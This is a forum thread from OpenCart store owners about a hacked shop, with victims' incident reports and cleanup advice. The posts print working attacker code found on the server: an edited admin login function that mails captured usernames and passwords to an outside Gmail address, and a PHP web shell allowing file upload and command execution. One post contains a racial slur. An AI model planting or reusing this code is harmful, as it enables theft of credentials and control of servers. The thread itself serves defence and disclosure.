Post by tonybarnes » Mon Jul 06, 2015 10:30 pm

OC 1.5.5.1

Just discovered some little shitbag got into our site through the /download vulnerability. I'd thought I'd secured that, so have now deleted that directory, turned off downloads, and reset main account password (server level).

Digging around I found that they had set up authorize.net to send credit card details to a yopmail account. Sorted that. Changed all passwords, etc.

By pure luck after removing the /downloads folder I got an error message in the admin that prompted me to look in the admin/controller/common folder... little fucker had edited login.php too!! Haven't seen anyone else report this - pretty simple script edit that emails through login info:

Code: Select all

protected function validate() {
		if (isset($this->request->post['username']) && isset($this->request->post['password']) && !$this->user->login($this->request->post['username'], $this->request->post['password'])) {
			$this->error['warning'] = $this->language->get('error_login');
		}
		
		if (!$this->error) {
$smail=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']."|".$this->request->post['username']."|".$this->request->post['password'];
mail("thankforyourhelp2015@gmail.com","OUR-SITE",$smail,"From: OUR-SITE@fly.com\r\nReply-to: thankforyourhelp2015@gmail.com");
			return true;
		} else {
			return false;
		}
	}
So as soon as I updated things, he knew our new credentials!!! :choke: :crazy:

I'm trapsing through file edit dates now to see if anything else compromised, but one to look out for guys and gals!!

New member

Posts

Joined
Thu Dec 06, 2012 1:09 am

Post by tonybarnes » Mon Jul 06, 2015 11:03 pm

Ok here's a full list of changed files that I found:

/admin/controller/extension/payment.php
/admin/controller/common/login.php
/admin/controller/extension/payment.php
/catalog/controller/product/product.php
/catalog/controller/payment/authorizenet_aim.php
/catalog/controller/payment/authorizenet_sim.php
/catalog/controller/payment/pp_pro.php
/downloads/ - various stuff in here
/image/flags/index.php

Couldn't spot what had actually changed in the payment & pp_pro ones (didn't look that hard TBH), this was contents of /image/flags/index.php

Code: Select all

<?php
if(@$_REQUEST["id"]== 'mm')
{
$files = @$_FILES["files"];
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>shell</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
} 
if(@$_REQUEST["id"]== 'nn')
{
system($_GET["cmd"]);
}
?>

New member

Posts

Joined
Thu Dec 06, 2012 1:09 am

Post by Dhaupin » Tue Jul 07, 2015 4:56 am

Thanks for sharing some snippets related to this.

I dont know if it's related, but some brown dude uploaded this. He has been making rounds testing for payment gateways and/or trying to fraud to US addresses. Could be the same one who keeps trying to inject into a honeypot OC download folder and/or the same one who dropped that hack....potentially :D

Attachments

11045412786508431385641786094925139794710n.jpg

Huh? - 11045412786508431385641786094925139794710n.jpg (134.61 KiB) Viewed 12059 times


https://creadev.org | support@creadev.org - Opencart Extensions, Integrations, & Development. Made in the USA.


User avatar
Active Member

Posts

Joined
Tue May 13, 2014 3:45 am
Location - PA

Post by tonybarnes » Wed Jul 15, 2015 11:02 pm

lmao - just chilling!

New member

Posts

Joined
Thu Dec 06, 2012 1:09 am

Post by TofuMan » Fri Jun 03, 2016 10:59 pm

Hi - I just wanted to firstly thank you tonybarns for detailing how you fixed your hack - it happened to us in January on v1.5.6 and your post was very helpful at tidying things up again.

Now on OpenCart v2, we have had the Authorize.net hack again - seemingly identical. So I am not sure if this does use the 'download vulnerability'...

I have posted on another thread about his hack - but I think it may be helpful to post here too as it came up in Google searches. :-)

We had the same symptoms: when you go to the checkout 'Authorize.net' appears as a payment option above all others... when the customer chooses it the payment cannot be made as it does not direct to a live account... but it may allow the hacker to obtain customer data... we cannot determine exactly what he was trying to get!

For anyone reading this who has this problem... please note the following:

1. VERY IMPORTANT: The login page has been hacked!
The login page code has been edited so that if you try and change the passwords, when you login again the Hacker receives the new password directly to his email account.

2. You CANNOT enable/disable Authorize.net via OpenCart admin.
The hack uses a file that by-passes this function completely so it has nothing to do with the payment settings you have set up. You must delete/replace hacked files via FTP to restore normal function.

3. You will have to fix this problem via FTP by locating and overwriting the changed files then changing your password (ideally through PhpMyAdmin). There is no point changing your passwords until AFTER you fix the login page hack.

We do not believe this hack requires the hacker is able to login... but we cannot be sure. In v1.5.6 we found all sorts of junk had been uploaded to the server... but I do not think this is the 'download vulnerability' people spoke about before as we are in V2 and we had already removed the list of file types that could be uploaded.

Here is how we fixed it:

Firstly, we had to find all the files that had been changed by the hacker... you will see that these have a 'Last modified' date that will be very recent compared to the other files (most of which will be the same date from the time of installation).

We found on both occasions that these were the files that had been changed:

/admin/controller/extension/payment.php
/admin/controller/common/login.php
/catalog/controller/payment/authorizenet_aim.php

However, we would advise you to check through the folders for any other new or recently modified files if the following instructions do not fix your problem.

We had a copy of the website elsewhere so we could see that not only were the last modified dates 'today' but the file sizes were notably different - so the code was not the same.

We suggest you take a full backup of your site via FTP - name it clearly as a 'hacked' version not to be re-uploaded.

Once this is done unzip a new local copy of your version of OpenCart... locate the the files listed above and copy them to a folder & subfolders (we called ours 'Authorize Hack Clean Files') . You will then be able to quickly upload if it ever happens again.

Then delete the files on the server and replace with the 'clean' files - this should be enough to fix the problem.

Please note:
You cannot simply rename the authorizenet_aim.php file - even if you change the name and remove the file extension - we found it kept loading the Authorize.net option in the checkout. It must be completely removed.

Once those changes are done, you can set up a new password for your accounts. We used a secure password generator to try and make it more certain it was not a hack via password login... we don't think it is... but we do not know how this hack is done.

Lastly we deleted all the allowed file types and meme types in the Settings > Uploads... we kept a copy of these lists in case we need to put any/all of them back again.

I hope these details help a few people out - i would really appreciate anyone listing any 'official' name for this hack as it seems to be happening often enough and in the same way, I imagine it has been identified by others too?

User avatar
Newbie

Posts

Joined
Mon Jun 28, 2010 3:15 am
Location - Hampshire, UK

Post by siteadvice » Sat Sep 29, 2018 12:28 am

Anyone have any further information on what security issue hackers are exploiting to be able to get access at this level?

inframes.com Website Design with Opencart, Coldfusion, Railo and Concrete5


User avatar
New member

Posts

Joined
Mon Oct 24, 2011 8:12 pm

Post by IP_CAM » Sat Sep 29, 2018 1:51 pm

Well, the main OC User Problem might be, that only a small fraction of them
has much knowledge about what they're doing, in addition so-called Dev's,
and this makes it easy for Hackers, to do all kinds of things on such Sites! :laugh:
Just to give you an example of 'wide open' CHMOD 777 OC Sites: :choke:
https://www.google.com/search?q=%22index+of%22+Opencart

In addition, some Extensions might contain badcode, once in a while, but
since many Users don't know a thing, they are unable, to find out, where to
look, and how such Code looks like, in the first place. Many Dark-Net Sites
also offer paid OC Code for free, or almost free, and OC Users are unaware of,
that the People behind such 'offerings' usually have some plans, related to
hard cash, in one or the other way, so, it's usually not clean OC-Code related,
if a Site suddenly runs into such problems.

But, strictly technically/logically, one should not have a single Piece of Code
on a Server, wich is not used in real as well, like Authorizenet, Openbay, Amazon,
and/or other Payment/Shipping/Whatever 'Functions', but only have installed,
what is required to use. But since some of those Extensions are 'hardcoded' into
the Source, it's not so easy, to remove them all, without a certain knowledge about OC.

I am just now in the process of testing a Shop Site, where I removed Authorizenet,
Ebay, Openbay, and Amazon from the Source yesterday. it worked on spot, and if I am
lucky, then I won't find many misses, due to either removing too much, or too less,
in certain files, containing some Code or Scripts, related with those 'Functions'.
http://www.ejacob.ch/cart/

But even Facebook got hit, so, there is always a chance, to get hacked. Especially for
those OC Users, allowing others to upload images and/or other files. I just found one
of those strange images, placed in a free Theme Extension, full of Code, and I only
found out about, because I wondered about it's sheer size, for a simple Background
Image. So, I had to make use of my famous Image STRIPPER Program again, to get all not
'required' Code out of all of my Shop Images, and thereby make 'em a little smaller in
Size as well. :D

Ernie

Attachments

XP Image Content Stripper, removes Links, Code, and other garbage out of images.


For Sale: Top URL's, including an OpenCart V-Pro Shop!
A wide range of matching Designs can be seen here: http://www.opencart.li
For Information on URL's offered, please contact me at: jti@jacob.ch
Hundreds of Mods in 380+ Repositories for OC v.1.5.x - v.2.3.x
to be found on my Github Site: https://github.com/IP-CAM
Image


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by Parmodya » Tue Oct 09, 2018 9:43 am

Can anyone check for security vulnerability on my site https://rvnb.in/tsf-police-shoes-black-colour/

It is a tsf shoes store

Opencart performance optimizations
homepage https://rvnb.in
Product page https://rvnb.in/tsf-police-shoes-black-colour/


Newbie

Posts

Joined
Thu May 10, 2018 9:40 am


Post by IP_CAM » Wed Oct 10, 2018 1:36 am

Well, this Code is far from even beeing comparable with the OC Default way of
doing things, it's all highly Custom Code, from the top down to the bottom. 8)
So, nobody would be able, to assist in anything, I fear ...
Good Luck!
Ernie

For Sale: Top URL's, including an OpenCart V-Pro Shop!
A wide range of matching Designs can be seen here: http://www.opencart.li
For Information on URL's offered, please contact me at: jti@jacob.ch
Hundreds of Mods in 380+ Repositories for OC v.1.5.x - v.2.3.x
to be found on my Github Site: https://github.com/IP-CAM
Image


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland
Who is online

Users browsing this forum: No registered users and 4 guests